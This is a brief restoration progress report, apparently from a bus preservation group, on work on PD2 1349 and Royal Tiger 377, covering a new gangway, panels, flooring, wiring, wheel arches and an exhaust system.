Restoration work remains focussed on PD2 1349 and Royal Tiger 377. The former has received a new gangway upstairs as well as new structural panels on the upper deck. The gangway comprises a new metal base with heavy duty plywood on top. In due course this will be covered by lino and wear strips. More wood inserts have been fitted to the metal pillar sections and new cab sections have been fabricated and dry fitted.

More floor sections have been shaped for 377 and are also dry fitted. The wiring is now mainly in place and the control panel is in situ. Wheel arches are being shaped and fitted for both front and rear and as of today the replacement exhaust system has arrived.

Both projects are progressing steadily although much remains to be done and completion is still well over a year away.
